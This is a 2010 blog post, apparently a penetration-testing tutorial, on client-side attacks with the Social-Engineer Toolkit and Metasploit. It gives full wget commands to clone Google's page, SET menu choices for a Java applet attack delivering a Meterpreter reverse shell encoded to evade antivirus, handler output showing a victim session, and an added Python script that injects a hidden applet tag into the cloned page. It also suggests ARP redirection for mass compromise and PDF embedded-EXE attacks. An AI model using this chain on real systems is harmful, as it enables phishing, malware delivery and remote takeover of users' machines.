netsecuritystuff
Client Side exploits

Posted on February 10, 2010
Client side attacks have nowadays become a major focus when performing penetration tests. You can be sure that once you forward an infected Word document or attach a malicious exe to a PDF, someone in the organisation will open it, and such attacks are very hard to defend against. A while back Valsmith, Colin Ames and David Kerb released a great way to perform such client attacks at the Black Hat and DEF CON conferences with the MetaPhish paper and code (http://attackresearch.com/pub.html). This brought a whole new aspect: using signed Java applets to attack clients and attaching Metasploit payloads to PDF documents. Since then David Kennedy of the Social-Engineer Framework has produced a marvelous automated tool called SET, the Social-Engineer Toolkit. SET allows you to perform all the above attacks and more. One feature I love is the website cloning feature; combine it with an ARP redirect attack using ettercap and you could pwn all the clients during a pentest (with permission, of course). Imagine cloning a site as common as Google or Facebook and then performing a Java applet attack: total mass pwnage.

On BackTrack 4 final, SET lives at /pentest/exploits/SET/set.

Usage:

I first downloaded google.com and moved it to /var/www/google/. wget with page requisites does the job; it saves the page and its resources into a directory named after the host, which is then moved under the web root:

wget -p -k http://www.google.co.ke/
cp -r www.google.co.ke/ /var/www/
cd /var/www/
mv www.google.co.ke google
cd /pentest/exploits/SET/
./set

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks (UPDATED)
2. Website Java Applet Attack (UPDATED)
3. Update Metasploit
4. Update SET
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit

Enter your choice: 2

Website Attack Vectors

1. Let SET create a website for you
2. Clone and setup a fake website (NEW)
3. Import your own website (NEW)
4. Return to main menu.
Enter number: 3
Enter your current IP Address: 192.168.20.1
Enter the path to the website to be cloned: /var/www/google/

What payload do you want to generate:

1. Windows Shell Reverse_TCP: Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter: Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL: Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell: Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64: Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64: Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64: Connect back to the attacker (Windows x64), Meterpreter
8. Import your own executable: Specify a path for your own executable

Enter choice (example 1-4): 2

Below is a list of encodings to try and bypass AV. Select one of the below, Shikata_Ga_Nai is typically the best.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice (enter for default): 2

Usually 1 to 4 does the trick, if you get an error message, some encoders don't like more than one. Specify 0 if you want.
How many times do you want to encode the payload: 4
Enter the PORT of the listener: 4444

[-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
…

Note that each encoding iteration wraps the previous result in another decoder stub, which is why the size grows by the same 27 bytes every time; stacking iterations makes the binary bigger, not necessarily stealthier.
SET then writes a Metasploit resource file and starts the handler from it:

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.20.1
LHOST => 192.168.20.1
resource (src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.20.1:4444
[*] Starting the payload handler...
msf exploit(handler) >

The client browses to the fateful page http://192.168.20.1, gets the cloned Google search page and is prompted to run the Java applet. The client needs Java installed, and the user has to accept the security warning for the applet before the payload runs. ExitOnSession false keeps the handler listening after the first session, so several clients can connect back to the same listener.
msf exploit(handler) >
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.20.1:4444 -> 192.168.20.4:1123)
msf exploit(handler) > sessions

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.20.1:4444 -> 192.168.20.4:1123

Review a video here on the use of SET: http://vimeo.com/groups/33570/videos/8450443

SET will soon introduce version 0.4, with which you can sign the Java applets yourself. Review a video here on the new version of SET: http://vimeo.com/9198233

Metasploit, on the other hand, has added a Java applet module to trunk (exploit/multi/browser/java_signed_applet), with an excellent rank. I have tested it against Firefox and IE. It works wonders. For the Metasploit module there is a good tutorial to follow at PaulDotCom: http://pauldotcom.com/wiki/index.php/Episode185. The tutorial is easy to understand and follow. Try out the clone feature on SET, which downloads the URL you give it and embeds the Java applet in it.

As for PDF attacks, the procedure is the same: try out the Adobe attacks, especially "Adobe PDF Embedded EXE Social Engineering" on SET; in Metasploit it is the exploit windows/fileformat/adobe_pdf_embedded_exe.

References:
http://www.attackresearch.com
http://www.social-engineer.org
http://pauldotcom.com
http://metasploit.com

Credits: David Kennedy, Valsmith, hdm and the Metasploit crew, Carlos Perez, the PaulDotCom crew, muts

Happy client side hacking
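To make the "clone a site and embed the applet" step concrete, here is an added example (not SET's own code, and not how SET necessarily implements its cloner) of the two edits a cloned page needs before it is served from the attacker's box: a <base> tag so that every relative link, stylesheet and image still resolves against the real site (only index.html was copied), and a one-pixel <applet> tag pointing at the attacker-hosted jar. The sample HTML, the jar URL http://192.168.20.1/Java.jar and the applet class name "Applet" are all constructed for the example.

```python
"""Embed a Java applet tag into a cloned HTML page (added example).

Two edits turn a saved copy of a site's front page into a working
applet-delivery page:
  1. a <base href> pointing at the original site, so relative CSS, image
     and form URLs keep resolving to the real host and the clone renders
     exactly like the original;
  2. an <applet> tag right after <body>, so the Java plug-in fetches the
     jar as soon as the page loads. The user still has to accept the
     security prompt for a self-signed jar before anything runs.
All URLs, class names and the sample page below are constructed, not
taken from SET or from the original post.
"""
import re

# Constructed sample: a stripped-down saved search page with relative
# links, the way `wget -p -k` of a front page looks on disk.
CLONED_PAGE = """<!DOCTYPE html>
<html>
<head>
<title>Search</title>
<link rel="stylesheet" href="/css/main.css">
</head>
<body>
<img src="/images/logo.png">
<form action="/search"><input name="q"></form>
</body>
</html>"""


def _insert_after(html: str, tag_pattern: str, fragment: str):
    """Insert fragment right after the first tag matching tag_pattern.

    Returns None when the tag is absent so the caller can fall back.
    A callable is not needed here because we slice instead of re.sub,
    which also avoids backslash-escape surprises in the fragment.
    """
    m = re.search(tag_pattern, html, re.IGNORECASE)
    if m is None:
        return None
    return html[: m.end()] + fragment + html[m.end():]


def embed_applet(html: str, original_url: str, jar_url: str, applet_class: str) -> str:
    """Return the cloned page with a <base> to the real site and an applet tag."""
    if not original_url.endswith("/"):
        original_url += "/"
    base_tag = f'<base href="{original_url}">'
    applet_tag = (
        f'<applet code="{applet_class}" archive="{jar_url}" '
        'width="1" height="1"></applet>'
    )

    # <base> must precede any relative URL, so it goes first inside <head>.
    # Fall back to creating a <head> after <html>, or at the very top,
    # for pages saved without one.
    new = _insert_after(html, r"<head[^>]*>", base_tag)
    if new is None:
        new = _insert_after(html, r"<html[^>]*>", "<head>" + base_tag + "</head>")
    if new is None:
        new = "<head>" + base_tag + "</head>" + html
    html = new

    # The applet goes at the top of <body>; append it if there is no <body>.
    new = _insert_after(html, r"<body[^>]*>", applet_tag)
    html = new if new is not None else html + applet_tag
    return html


if __name__ == "__main__":
    # Hypothetical attacker host and jar name, matching the LHOST used above.
    print(embed_applet(CLONED_PAGE, "http://www.google.co.ke",
                       "http://192.168.20.1/Java.jar", "Applet"))
```

Write the result to /var/www/google/index.html and the clone keeps pulling its real assets from the target site while the jar comes from the listener box; this is also why the attacker's IP shows up in the victim's browser history and proxy logs right next to the legitimate domain, which is what a defender should be hunting for.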
2 Responses to Client Side exploits

Dexx says:
February 12, 2010 at 2:35 pm
I like!

charles watathi says:
February 12, 2010 at 4:38 pm
Welcome Dexx